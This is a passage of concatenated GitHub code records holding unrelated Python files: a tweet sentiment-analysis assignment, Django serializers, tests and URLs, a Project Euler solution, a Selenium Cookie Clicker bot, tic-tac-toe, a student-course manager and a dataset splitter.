labels = load_specific_score(dataset = i_dataset, algorithm = i_algorithm)\n# labels = np.array([np.int(x) for x in labels])\n# results[key][\"scores\"] = scores\n# results[key][\"labels\"] = labels\n \n# key_it += 1\n\n# print(\"Successfully loaded results for {:<10} : {:<15}\".format(i_dataset, i_algorithm))\n# return results\n\ndef separate_in_and_out(scores, labels, outlier_label = 1):\n \n inlier_idx = np.where(labels != outlier_label)[0]\n outlier_idx = np.where(labels==outlier_label)[0]\n scores = (scores-np.amin(scores))\n # scores = scores / np.amax(scores)\n # print(labels)\n # print(scores)\n # print(inlier_idx)\n # Classwise scores\n inlier_scores = scores[inlier_idx]\n outlier_scores = scores[outlier_idx]\n\n return inlier_scores, outlier_scores, inlier_idx, outlier_idx\n\n# def show_all_stored_experiments():\n# common_results_dict = pickle.load(open('/home/erik/Github/exjobb_resultat/data/name_dict.pkl','rb'))\n# print(\"Experiments with stored results:\\n\")\n# print(\"\\t{:<10} {:<15} {:<30}\".format(\"Dataset\",\"Algorithm\", \"Experiment name\"))\n# datasets = []\n# algorithms = []\n# for dataset, experiments in common_results_dict.items():\n# datasets.append(dataset)\n# for algorithm, exp_name in experiments.items():\n# algorithms.append(algorithm.lower())\n# print(\"\\t{:<10} {:<15} {:<30}\".format(dataset, algorithm, exp_name))\n \n# return datasets, algorithms","repo_name":"KratzErik/exjobb_resultat","sub_path":"utils/unpickle_scores.py","file_name":"unpickle_scores.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6985849692","text":"# Function that reads the file names\r\ndef readFiles (fileName):\r\n inFile = open (fileName, \"r\", encoding='utf-8')\r\n return inFile\r\n\r\n# Function that reads the keyword files and stores the keywords in a set\r\ndef readKeywords (keywordFiles, check):\r\n # Each set represent different keywords depending on their sentiment values\r\n negative = set ()\r\n positive = set ()\r\n neutral = set ()\r\n expressions = set ()\r\n\r\n # Iterates through each line in keyword file\r\n for line in keywordFiles:\r\n sentimentValue = line.split(\",\") # split each line by the comma\r\n sentimentValue [1] = int (sentimentValue [1].rstrip(\"\\n\")) # Getting rid of whitespace and obtaining the sentiment value\r\n if sentimentValue [1] == 10:\r\n positive.add (sentimentValue[0])\r\n elif sentimentValue [1] == 1:\r\n negative.add (sentimentValue[0])\r\n elif sentimentValue [1] == 7:\r\n neutral.add (sentimentValue[0])\r\n else:\r\n expressions.add (sentimentValue[0])\r\n\r\n # Closes the file before iterating through each line in the file again\r\n keywordFiles.close()\r\n\r\n # returns the keyword sets\r\n if check == 1:\r\n return positive\r\n elif check == 2:\r\n return negative\r\n elif check == 3:\r\n return neutral\r\n else:\r\n return expressions\r\n\r\n# This function determines the timezone/region the tweet came from\r\ndef getTimeZone (tweetFiles):\r\n timeZoneList = []\r\n\r\n\r\n for line in tweetFiles:\r\n line = line.strip() # Strips off any whitespace from either end of each tweet\r\n splitLine = line.split(\"]\") # splits the tweet into the latitude/longitude and the rest of the tweet\r\n splitLine.pop (1)\r\n for word in splitLine:\r\n word = word.lstrip(\"[\") # gets rid of the left bracket\r\n word = word.split(\", \")\r\n if len(word) == 2:\r\n latitude = float (word [0])\r\n longitude = float (word [1])\r\n # Determines the region of the tweet based on the latitude/longitude\r\n if 24.660845 <= latitude < 49.189787:\r\n if -87.518395 <= longitude < -67.444574:\r\n timeZoneList.append(\"Eastern\")\r\n if -101.998892 <= longitude < -87.518395:\r\n timeZoneList.append(\"Central\")\r\n if -115.236428 <= longitude < -101.998892:\r\n timeZoneList.append(\"Mountain\")\r\n if -125.242264 <= longitude < -115.236428:\r\n timeZoneList.append(\"Pacific\")\r\n else:\r\n timeZoneList.append(\"None\")\r\n return timeZoneList\r\n\r\n# Function that returns the happiness score of every single tweet, each element corresponds\r\n# to the happiness score from a single tweet in the file\r\ndef readTweets (tweetsFiles,positiveWords,negativeWords,neutralWords,expressionWords):\r\n numberofKeywords = 0\r\n PUNC = \".?!#@\"\r\n sentiment = 0\r\n sentimentLst = []\r\n\r\n for line in tweetsFiles:\r\n line = line.strip() # Strips off any whitespace from either end of each tweet\r\n splitLine = line.split() # splits the tweet into words based off whitespace\r\n\r\n for word in splitLine:\r\n word = word.strip () # Strips off any whitespace from either end of each word\r\n word = word.strip(PUNC) # Removes any punctuation from beginning and end of the word\r\n word = word.lower() # Converts the word into lower case letters\r\n if word in positiveWords:\r\n sentiment += 10\r\n numberofKeywords +=1\r\n if word in neutralWords:\r\n sentiment += 7\r\n numberofKeywords += 1\r\n if word in negativeWords:\r\n sentiment += 1\r\n numberofKeywords += 1\r\n if word in expressionWords:\r\n sentiment += 5\r\n numberofKeywords += 1\r\n if numberofKeywords!= 0:\r\n sentimentLst.append(sentiment//numberofKeywords)\r\n else:\r\n sentimentLst.append(-1)\r\n sentiment = 0\r\n numberofKeywords = 0\r\n return sentimentLst\r\n\r\n# Function that returns the tuple for each region containing:\r\n# The average happinness value\r\n# Number of keywords tweets\r\n# Number of tweets\r\ndef regionTuple (happinessScoreTweets,time_zones, check2):\r\n sumEasternHappinessScore = 0\r\n sumCentralHappinessScore = 0\r\n sumMountainHappinessScore = 0\r\n sumPacificHappinessScore = 0\r\n\r\n numEasternKeywordTweets = 0\r\n numCentralKeywordTweets = 0\r\n numMountainKeywordTweets = 0\r\n numPacificKeywordTweets = 0\r\n\r\n\r\n numEasternTweets = 0\r\n numCentralTweets = 0\r\n numMountainTweets = 0\r\n numPacificTweets = 0\r\n\r\n index = 0\r\n\r\n # Adds the sum of the happiness score for each region and counts the number of tweets in that region\r\n for region in time_zones:\r\n if region == \"Eastern\":\r\n if happinessScoreTweets [index] != -1:\r\n sumEasternHappinessScore += happinessScoreTweets [index]\r\n numEasternKeywordTweets+=1\r\n numEasternTweets +=1\r\n else:\r\n numEasternTweets+=1\r\n\r\n if region == \"Central\":\r\n if happinessScoreTweets [index]!=-1:\r\n sumCentralHappinessScore += happinessScoreTweets[index]\r\n numCentralKeywordTweets += 1\r\n numCentralTweets+=1\r\n else:\r\n numCentralTweets+=1\r\n if region == \"Mountain\":\r\n if happinessScoreTweets [index]!= -1:\r\n sumMountainHappinessScore+= happinessScoreTweets[index]\r\n numMountainKeywordTweets += 1\r\n numMountainTweets +=1\r\n else:\r\n numMountainTweets +=1\r\n if region == \"Pacific\":\r\n if happinessScoreTweets [index]!= -1:\r\n sumPacificHappinessScore += happinessScoreTweets [index]\r\n numPacificKeywordTweets += 1\r\n numPacificTweets +=1\r\n else:\r\n numPacificTweets +=1\r\n index +=1\r\n\r\n # Computes the average happiness value for each region\r\n if numEasternKeywordTweets!=0:\r\n averageEasternHappinnesValue = sumEasternHappinessScore/numEasternKeywordTweets\r\n else:\r\n averageEasternHappinnesValue = 0\r\n if numCentralKeywordTweets != 0:\r\n averageCentralHappinnesValue = sumCentralHappinessScore/numCentralKeywordTweets\r\n else:\r\n averageCentralHappinnesValue = 0\r\n if numMountainKeywordTweets!= 0:\r\n averageMountainHappinessValue = sumMountainHappinessScore/numMountainKeywordTweets\r\n else:\r\n averageMountainHappinessValue = 0\r\n if numPacificKeywordTweets!=0:\r\n averagePacificHappinessValue = sumPacificHappinessScore/numPacificKeywordTweets\r\n else:\r\n averagePacificHappinessValue = 0\r\n\r\n # returns the tuple with the three aforementioned parameters (check comment above the function)\r\n easternTuple = (averageEasternHappinnesValue,numEasternKeywordTweets,numEasternTweets)\r\n centralTuple = (averageCentralHappinnesValue,numCentralKeywordTweets,numCentralTweets)\r\n mountainTuple = (averageMountainHappinessValue,numMountainKeywordTweets,numMountainTweets)\r\n pacificTuple = (averagePacificHappinessValue,numPacificKeywordTweets,numPacificTweets)\r\n\r\n if check2 == 1:\r\n return easternTuple\r\n if check2 == 2:\r\n return centralTuple\r\n if check2 == 3:\r\n return mountainTuple\r\n if check2 == 4:\r\n return pacificTuple\r\n\r\n\r\n\r\n# processes the tweets using all the above function\r\ndef compute_tweets(fileTweets,fileKeywords):\r\n\r\n # returns an empty list if a file not found exception was found\r\n emptylist = [(0,0,0),(0,0,0),(0,0,0),(0,0,0)]\r\n try:\r\n # Stores keywords and their sentiment values into 4 sets\r\n positiveSet = readKeywords(readFiles(fileKeywords), 1)\r\n negativeSet = readKeywords(readFiles(fileKeywords), 2)\r\n neutralSet = readKeywords(readFiles(fileKeywords), 3)\r\n expressionSet = readKeywords(readFiles(fileKeywords), 4)\r\n except:\r\n return emptylist\r\n\r\n\r\n # list that contains the happiness score of every single tweet, each element corresponds\r\n # to a happiness score from a single tweet in the file\r\n tweetsHappinesScore = readTweets(readFiles(fileTweets),positiveSet,negativeSet,neutralSet,expressionSet)\r\n\r\n # list that contains the timezones of every single tweet, each element corresponds to\r\n # a timezone froma single tweet in the file\r\n timezones = getTimeZone(readFiles(fileTweets))\r\n\r\n # Returns a tuple with average happiness value for that region\r\n # along with the number of tweets in that region with keywords\r\n # along with the number of tweets in that region overall\r\n eastern = regionTuple(tweetsHappinesScore,timezones,1)\r\n central = regionTuple(tweetsHappinesScore,timezones,2)\r\n mountain = regionTuple(tweetsHappinesScore,timezones,3)\r\n pacific = regionTuple(tweetsHappinesScore,timezones,4)\r\n\r\n lst = [eastern,central,mountain,pacific]\r\n return lst\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"jespinal-uwo/CS-1026","sub_path":"Assignment-3/sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":9131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41903859981","text":"from rest_framework import serializers\nfrom pesticide_app.models import Reactor\n\n\nclass ReactorSerializer(serializers.ModelSerializer):\n reacter_details = serializers.SerializerMethodField('reacterDetails')\n comment_details = serializers.SerializerMethodField('commentDetails')\n\n def reacterDetails(self, obj):\n details = {\n 'id': obj.user.id,\n 'name': obj.user.name,\n 'enrollment_number': obj.user.enrollment_number,\n }\n return details\n\n def commentDetails(self, obj):\n details = {\n 'id': obj.comment.id,\n 'issue_id': obj.comment.issue.id,\n 'project_id': obj.comment.issue.project.id,\n 'project_name': obj.comment.issue.project.name,\n }\n return details\n\n class Meta:\n model = Reactor\n fields = '__all__'\n","repo_name":"MihirSachdeva/pesticide-docker","sub_path":"pesticide_backend/src/pesticide_app/api/serializers/reactor.py","file_name":"reactor.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"4175531460","text":"from datetime import date\nfrom random import randrange\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom model_bakery import baker\n\nfrom applications.courses.models import Subject, Course\n\nUser = get_user_model()\n\n\nclass SubjectTestCase(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n test_subject = Subject.objects.create(name='Subject_1')\n test_subject.save()\n\n def test_subject_lowercase_name(self):\n subject = Subject.objects.get(name='subject_1')\n self.assertTrue(subject.name.islower())\n\n\nclass CourseTestCase(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n test_teacher = User.objects.create_user(email='teacher@gmail.com', password='mrrobot990')\n test_teacher.save()\n test_subject = Subject.objects.create(name='Subject_1')\n test_subject.save()\n test_courses = baker.make('courses.Course', teacher=test_teacher, status='online',\n subject=test_subject, available_places=10, discount=20,\n start_date=date(2023, 1, 10), end_date=date(2023, 1, 30),\n price=1000, _quantity=5)\n assert test_courses\n\n def test_course_title_max_length(self):\n courses = Course.objects.all()\n title_max_length = courses[0]._meta.get_field('title').max_length\n self.assertEqual(title_max_length, 180)\n\n def test_course_language_max_length(self):\n course = Course.objects.all()\n language_max_length = course[0]._meta.get_field('language').max_length\n self.assertEqual(language_max_length, 50)\n\n def test_course_availability(self):\n course = Course.objects.all()\n self.assertTrue(course[0].is_available)\n\n def test_course_final_price(self):\n course = Course.objects.all()\n self.assertEqual(course[0].final_price, 800)\n","repo_name":"aliiavgh/courses_team_hackathon","sub_path":"applications/courses/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37029590822","text":"import time\nimport math\n\ndef calc(x, num) :\n t = 0\n p = 1\n k = 1\n sqx = int(math.sqrt(x))\n cnt = 0\n a = 0\n while 1:\n a = (t + sqx * k) // p\n right = (a * p - t)\n np = k * k * x - right * right\n d = math.gcd(np, p)\n np = np // d\n p = p // d\n nk = k * p\n nt = right * p\n p = np\n t = nt\n k = nk\n cnt = cnt + 1\n num = num - 1\n if num == 0:\n break\n return a\n\ndef issq(x):\n sq = int(math.sqrt(x))\n return sq * sq == x or (sq + 1) * (sq + 1) == x\n\ndef compute(n) :\n p = 0;\n while True:\n p = p + 1\n fz = 1\n fm = 0\n for i in range(p, 0, -1):\n tmp = fz\n fz = fm\n fm = tmp\n nfz = calc(n, i) * fm + fz\n nfm = fm\n d = math.gcd(nfm, nfz)\n fz = nfz // d\n fm = nfm // d\n if fz * fz - n * fm * fm == 1:\n return fz\n\ndef solve():\n mx = 0\n mxp = 0\n for n in range(1, 1001, 1):\n if issq(n):\n continue\n res = compute(n)\n if res > mx:\n mx = res\n mxp = n\n print(\"ans: \" + str(mxp))\n\ntime_start = time.time()\nsolve()\ntime_end = time.time()\nprint('time passed:', time_end-time_start, 's')","repo_name":"LxFee/ProjectEuler-Solutions","sub_path":"66/66.py","file_name":"66.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70391508212","text":"from django.urls import path\nfrom .views import RecipeListAPIView, RecipeListCreateAPIView, RecipieDetailChangeAPIView, StepDetailList, RecipeStepsList, IngredientList, IngredientEditList\n\nurlpatterns = [\n path('ingredients//user/', IngredientEditList.as_view()),\n path('ingredients/user/', IngredientList.as_view()),\n path('recipes//step//', StepDetailList.as_view()),\n path('recipes//step/', RecipeStepsList.as_view(), name = 'recipe_steps'),\n path('recipes//user/', RecipieDetailChangeAPIView.as_view()),\n path('recipes/user/', RecipeListCreateAPIView.as_view()),\n path('recipes/', RecipeListAPIView.as_view()),\n]","repo_name":"DanielSJuarez/batch-maker-app","sub_path":"recipes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6889504743","text":"import os\nimport numpy as np\nimport plotly\nimport plotly.graph_objs as go\n\nimport utils.io as io\n\n\ndef create_scatter_plot(del_confmat,visual_sim,glove_sim,labels,filename):\n mean_glove_sim = np.mean(glove_sim)\n std_glove_sim = np.std(glove_sim)\n text = []\n x = []\n y = []\n for i, label1 in enumerate(labels):\n for j, label2 in enumerate(labels):\n round_glove_sim = str(round(glove_sim[i,j],2))\n text.append(\n f'{label1} / {label2} (glove: {round_glove_sim})')\n x.append(visual_sim[i,j])\n y.append(del_confmat[i,j])\n\n trace = go.Scatter(\n x = x,\n y = y,\n mode = 'markers',\n text = text)\n\n layout = go.Layout(\n xaxis = dict(\n title = 'Visual Similarity'\n ),\n yaxis = dict(\n title = 'Conf Visual - Conf Glove'\n ),\n hovermode = 'closest'\n )\n\n plotly.offline.plot(\n {'data': [trace],'layout': layout},\n filename=filename,\n auto_open=False)\n \n\n\ndef main(exp_const,data_const):\n visual_confmat = np.load(data_const.visual_confmat_npy)\n glove_confmat = np.load(data_const.glove_confmat_npy)\n visual_embed = np.load(data_const.visual_embed_npy)\n labels = np.load(data_const.labels_npy)\n\n glove_vecs = visual_embed[:,:data_const.glove_dim]\n visual_vecs = visual_embed[:,data_const.glove_dim:]\n visual_sim = np.matmul(visual_vecs,np.transpose(visual_vecs))\n glove_sim = np.matmul(glove_vecs,np.transpose(glove_vecs))\n\n visual_confmat = np.maximum(0,np.log(visual_confmat+1e-6))\n glove_confmat = np.maximum(0,np.log(glove_confmat+1e-6))\n del_confmat = visual_confmat - glove_confmat\n\n filename = os.path.join(exp_const.vis_dir,'conf_vs_visual_sim.html')\n\n create_scatter_plot(del_confmat,visual_sim,glove_sim,labels,filename)\n\n\n","repo_name":"BigRedT/vico","sub_path":"exp/cifar100/vis/conf_vs_visual_sim.py","file_name":"conf_vs_visual_sim.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"7980590263","text":"# Bibliotecas necessarias para automatizar o CookieClicker\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nimport keyboard\r\nimport time\r\n\r\n# Caminho do webdriver e link do site\r\n# PATH = \"C:/ChromeWebdriver/chromedriver.exe\"\r\nURL = \"https://orteil.dashnet.org/cookieclicker/\"\r\n\r\n# inicializando o site\r\nwith webdriver.Chrome() as driver: \r\n time.sleep(2)\r\n driver.get(URL)\r\n time.sleep(2)\r\n\r\n # Selecionando o portuguesBR como idioma do jogo\r\n try:\r\n idioma = driver.find_element(By.ID, \"langSelect-PT-BR\")\r\n idioma.click()\r\n finally:\r\n print('Idioma Selecionado')\r\n # Mapeando o elemento HTML do cookie.\r\n bigCookie = driver.find_element(By.ID, \"bigCookie\")\r\n\r\n # Loop do jogo\r\n while True:\r\n # Iterando cliques\r\n for i in range(20):\r\n bigCookie.click()\r\n \r\n # Condicional para a compra de itens\r\n try:\r\n items = driver.find_elements(By.CLASS_NAME, \"enabled\") # Armazenando os itens disponiveis em uma lista\r\n time.sleep(0.5) # Tempo para 'farmar' cookies antes de efetuar mais uma compra\r\n items[-1].click() # Escolhendo o mais caro\r\n except:\r\n pass\r\n if keyboard.is_pressed(\"q\"): # Para encerrar o jogo\r\n break\r\n\r\nprint('Game Over')\r\ntime.sleep(2)\r\n","repo_name":"arnonhbcs/TreinamentoJr2023","sub_path":"clicker.py","file_name":"clicker.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39733600345","text":"from typing import List\n\nfrom app.internal.repository import UserRepository\nfrom app.internal.schemes import (\n CreateUserCommand,\n DeleteUserCommand,\n GetUserCommand,\n Success,\n UpdateUserCommand,\n UserModel,\n)\n\nfrom .base import BaseService\n\n\nclass UserService(\n BaseService[\n UserModel,\n CreateUserCommand,\n GetUserCommand,\n UpdateUserCommand,\n DeleteUserCommand,\n ]\n):\n repository: UserRepository\n\n def __init__(self, repository: UserRepository) -> None:\n super().__init__()\n self.repository = repository\n\n async def create(self, cmd: CreateUserCommand) -> UserModel:\n result = await self.repository.create(cmd=cmd)\n return UserModel.from_orm(result)\n\n async def get_all(self, skip: int = 0, limit: int = 100) -> List[UserModel]:\n result = await self.repository.get_all(skip=skip, limit=limit)\n return [UserModel.from_orm(row) for row in result]\n\n async def get(self, cmd: GetUserCommand) -> UserModel:\n result = await self.repository.get(cmd=cmd)\n return UserModel.from_orm(result)\n\n async def delete(self, cmd: DeleteUserCommand) -> Success:\n await self.repository.delete(cmd=cmd)\n return Success()\n\n async def update(self, cmd: UpdateUserCommand) -> Success:\n raise NotImplementedError\n","repo_name":"mirea-ninja/online-quest-backend","sub_path":"app/internal/service/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29846604870","text":"import uuid\r\n\r\nclass Course:\r\n def __init__(self, course_name, course_mark):\r\n self.course_id = str(uuid.uuid4())\r\n self.course_name = course_name\r\n self.course_mark = course_mark\r\n\r\n\r\ncourse_name = input(\"Enter course name: \")\r\ncourse_mark = float(input(\"Enter course mark: \"))\r\n\r\ncourse = Course(course_name, course_mark)\r\n\r\nprint(\"Course ID:\", course.course_id)\r\nprint(\"Course Name:\", course.course_name)\r\nprint(\"Course Mark:\", course.course_mark)\r\n\r\nclass Student:\r\n total_students = 0\r\n\r\n def __init__(self, student_name, student_age, student_number):\r\n self.student_id = str(uuid.uuid4())\r\n self.student_name = student_name\r\n self.student_age = student_age\r\n self.student_number = student_number\r\n self.courses_list = []\r\n Student.total_students += 1\r\n\r\n def enroll_course(self, course):\r\n self.courses_list.append(course)\r\n\r\n def get_student_details(self):\r\n return self.__dict__\r\n\r\n def get_student_courses(self):\r\n for course in self.courses_list:\r\n print(\"Course Name:\", course.course_name)\r\n print(\"Course Mark:\", course.course_mark)\r\n print()\r\n\r\n def get_student_average(self):\r\n total_marks = sum(course.course_mark for course in self.courses_list)\r\n average = total_marks / len(self.courses_list) if self.courses_list else 0\r\n return average\r\n\r\n\r\nstudents = [] # TODO 8 declare empty students list\r\n\r\nwhile True:\r\n try:\r\n selection = int(input(\"1. Add New Student\\n\"\r\n \"2. Delete Student\\n\"\r\n \"3. Display Student\\n\"\r\n \"4. Get Student Average\\n\"\r\n \"5. Add Course to Student with Mark\\n\"\r\n \"6. Exit\\n\")) # TODO 9 handle Exception for selection input\r\n\r\n if selection == 1:\r\n student_number = input(\"Enter Student Number: \")\r\n\r\n # TODO 10 make sure that Student number is not exists before\r\n existing_student = next((student for student in students if student.student_number == student_number), None)\r\n if existing_student:\r\n print(\"Student Number already exists. Please try again.\")\r\n continue\r\n\r\n student_name = input(\"Enter Student Name: \")\r\n while True:\r\n try:\r\n student_age = int(input(\"Enter Student Age: \"))\r\n break\r\n except ValueError:\r\n print(\"Invalid Value\")\r\n\r\n new_student = Student(student_name, student_age, student_number) # TODO 11 create student object\r\n students.append(new_student)\r\n\r\n print(\"Student Added Successfully\")\r\n\r\n elif selection == 2:\r\n student_number = input(\"Enter Student Number: \")\r\n target_student = None\r\n\r\n for student in students:\r\n if student.student_number == student_number:\r\n target_student = student\r\n break\r\n\r\n if target_student:\r\n students.remove(target_student)\r\n print(\"Student Deleted Successfully\")\r\n else:\r\n print(\"Student Not Found\")\r\n\r\n elif selection == 3:\r\n student_number = input(\"Enter Student Number: \")\r\n target_student = None\r\n\r\n for student in students:\r\n if student.student_number == student_number:\r\n target_student = student\r\n break\r\n\r\n if target_student:\r\n print(\"Student Details:\")\r\n print(target_student.get_student_details())\r\n else:\r\n print(\"Student Not Found\")\r\n\r\n elif selection == 4:\r\n student_number = input(\"Enter Student Number: \")\r\n target_student = None\r\n\r\n for student in students:\r\n if student.student_number == student_number:\r\n target_student = student\r\n break\r\n\r\n if target_student:\r\n average = target_student.get_student_average()\r\n print(\"Student Average:\", average)\r\n else:\r\n print(\"Student Not Found\")\r\n\r\n elif selection == 5:\r\n student_number = input(\"Enter Student Number: \")\r\n target_student = None\r\n\r\n for student in students:\r\n if student.student_number == student_number:\r\n target_student = student\r\n break\r\n\r\n if target_student:\r\n course_name = input(\"Enter Course Name: \")\r\n course_mark = float(input(\"Enter Course Mark: \"))\r\n new_course = Course(course_name, course_mark)\r\n target_student.enroll_course(new_course)\r\n print(\"Course Added to Student Successfully\")\r\n else:\r\n print(\"Student Not Found\")\r\n\r\n elif selection == 6:\r\n # TODO 16 call a function to exit the program\r\n break\r\n\r\n else:\r\n print(\"Invalid Selection. Please try again.\")\r\n\r\n except ValueError:\r\n print(\"Invalid Input. Please enter a number.\")\r\n\r\n","repo_name":"Abdullah-Talmas/final_project","sub_path":"final_project.py","file_name":"final_project.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5457754841","text":"class TicTacToe:\n def __init__(self):\n self.field = ' ' * 9\n self.dashes = \"---------\"\n # self.coord = ''\n # self.row_list = []\n # self.colum_list = []\n # self.diagonal_list = []\n self.t_t_t = [[self.field[0], self.field[1], self.field[2]], [self.field[3], self.field[4], self.field[5]],\n [self.field[6], self.field[7], self.field[8]]]\n self.moves = 0\n\n # def check(self, list_):\n # for i in range(3):\n # if list_[i][0] == list_[i][1] == list_[i][2]:\n # if list_[i][0] != ' ':\n # self.row_list.append(list_[0][i])\n # return self.row_list\n # if list_[0][i] == list_[1][i] == list_[2][i]:\n # if list_[0][i] != ' ':\n # self.colum_list.append(list_[0][i])\n # return self.colum_list\n # if list_[0][0] == list_[1][1] == list_[2][2] or list_[2][0] == list_[1][1] == list_[0][2]:\n # if list_[1][1] != ' ':\n # self.diagonal_list.append(list_[1][1])\n # return self.diagonal_list\n def check_row(self, list_):\n new_list = []\n for i in range(3):\n if list_[i][0] == list_[i][1] == list_[i][2]:\n if list_[i][0] != ' ':\n new_list.append(list_[0][i])\n return new_list\n\n def check_column(self, list_):\n new_list = []\n for i in range(3):\n if list_[0][i] == list_[1][i] == list_[2][i]:\n if list_[0][i] != ' ':\n new_list.append(list_[0][i])\n return new_list\n\n def check_diagonal(self, list_):\n new_list = []\n if list_[0][0] == list_[1][1] == list_[2][2] or list_[2][0] == list_[1][1] == list_[0][2]:\n if list_[1][1] != ' ':\n new_list.append(list_[1][1])\n return new_list\n\n def menu(self):\n print(self.dashes)\n print('|', self.t_t_t[0][0], self.t_t_t[0][1], self.t_t_t[0][2], '|')\n print('|', self.t_t_t[1][0], self.t_t_t[1][1], self.t_t_t[1][2], '|')\n print('|', self.t_t_t[2][0], self.t_t_t[2][1], self.t_t_t[2][2], '|')\n print(self.dashes)\n\n def win_condition(self):\n\n self.winner = self.check_column(self.t_t_t) + self.check_row(self.t_t_t) + self.check_diagonal(self.t_t_t)\n self.menu()\n\n while True:\n self.winner = self.check_column(self.t_t_t) + self.check_row(self.t_t_t) + self.check_diagonal(self.t_t_t)\n\n coords = input('Enter the coordinates: ')\n x, y = coords.split()\n if not (x.isdigit() and y.isdigit()):\n print('You should enter numbers!')\n continue\n if int(x) not in range(1, 4) or int(y) not in range(1, 4):\n print('Coordinates should be from 1 to 3!')\n continue\n y = int(y) - 1\n x = int(x) - 1\n if self.t_t_t[x][y] == ' ' and self.moves % 2 == 0:\n self.t_t_t[x][y] = 'X'\n self.moves += 1\n self.menu()\n\n if abs(self.field.count('X') - self.field.count('O')) > 1:\n print('Impossible')\n break\n elif len(self.winner) > 1:\n print('Impossible')\n break\n\n elif len(self.winner) == 0 and ' ' not in self.field:\n print('Draw')\n break\n elif self.winner:\n print(f'{self.winner[0]} wins')\n break\n elif self.t_t_t[x][y] == ' ' and self.moves % 2 == 1:\n self.t_t_t[x][y] = 'O'\n self.moves += 1\n self.menu()\n\n if abs(self.field.count('X') - self.field.count('O')) > 1:\n print('Impossible')\n break\n elif len(self.winner) > 1:\n print('Impossible')\n break\n\n elif len(self.winner) == 0 and ' ' not in self.field:\n print('Draw')\n break\n elif self.winner:\n print(f'{self.winner[0]} wins')\n break\n else:\n print('This cell is occupied! Choose another one!')\n\n\n def main(self):\n\n self.win_condition()\n\n\n\nTicTacToe().main()\n","repo_name":"LegendaryVasya/Tic-Tac-Toe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33255189954","text":"from PyQt6.QtGui import QColor\nfrom PyQt6.QtWidgets import QComboBox\n\nfrom view.worktop import GridScrollBar\n\n\nclass ComboBox(QComboBox):\n\n def __init__(self, parent = None) -> None:\n super().__init__(parent=parent)\n self.setStyleSheet(\"\"\"\n QComboBox {\n padding: 1px 5px 5px 2px;\n border: 2px solid #545454;\n }\n QComboBox QAbstractItemView {\n outline: 0;\n }\n QComboBox QAbstractItemView::item {\n height: 20px; \n }\n QComboBox QAbstractItemView::item:selected {\n background-color: #363636;\n border: none;\n }\n \"\"\")\n self.view().setVerticalScrollBar(GridScrollBar(vertical_color=QColor(\"#bfbfbf\")))\n self.view().setHorizontalScrollBar(GridScrollBar(vertical_color=QColor(\"#bfbfbf\")))\n\n def setCurrentText(self, text: str) -> None:\n if text is None:\n text = \"\"\n super().setCurrentText(text)","repo_name":"rodusek-v/gui-tad","sub_path":"gui/view/fields/combo_box.py","file_name":"combo_box.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71077883573","text":"import logging\nfrom typing import Dict\n\n\ndef dataset_splitter_by_time(\n dataset: list,\n dev_size: float,\n test_size: float,\n train_size: float,\n parts: int\n) -> Dict[str, list]:\n assert dev_size + test_size + train_size == 1.0, 'Dev + Test + Train must be equal to 1.0'\n\n dev_divided = dev_size / parts\n test_divided = test_size / parts\n train_divided = train_size / parts\n\n divisions = {\n 'dev': [],\n 'test': [],\n 'train': []\n }\n\n counter = 0\n for i in range(parts):\n start_pos = counter\n end_pos = round(len(dataset) * train_divided) + start_pos\n divisions['train'] += [dataset[item] for item in range(start_pos, end_pos)]\n counter = end_pos\n logging.debug('#{} Adding to train from: {} to {}'.format(str(i), str(start_pos), str(end_pos)))\n\n start_pos = counter\n end_pos = round(len(dataset) * test_divided) + start_pos\n divisions['test'] += [dataset[item] for item in range(start_pos, end_pos)]\n counter = end_pos\n logging.debug('#{} Adding to test from: {} to {}'.format(str(i), str(start_pos), str(end_pos)))\n\n start_pos = counter\n end_pos = round(len(dataset) * dev_divided) + start_pos\n divisions['dev'] += [dataset[item] for item in range(start_pos, end_pos)]\n counter = end_pos\n logging.debug('#{} Adding to dev from: {} to {}'.format(str(i), str(start_pos), str(end_pos)))\n\n start_pos = counter\n end_pos = len(dataset) - len(divisions['dev']) - len(divisions['test']) - len(divisions['train'])\n if end_pos > 0:\n divisions['train'] += [dataset[item] for item in range(start_pos, len(dataset))]\n logging.debug('Adding missing samples to train from: {} to {}'.format(str(start_pos), str(end_pos)))\n\n return divisions\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n 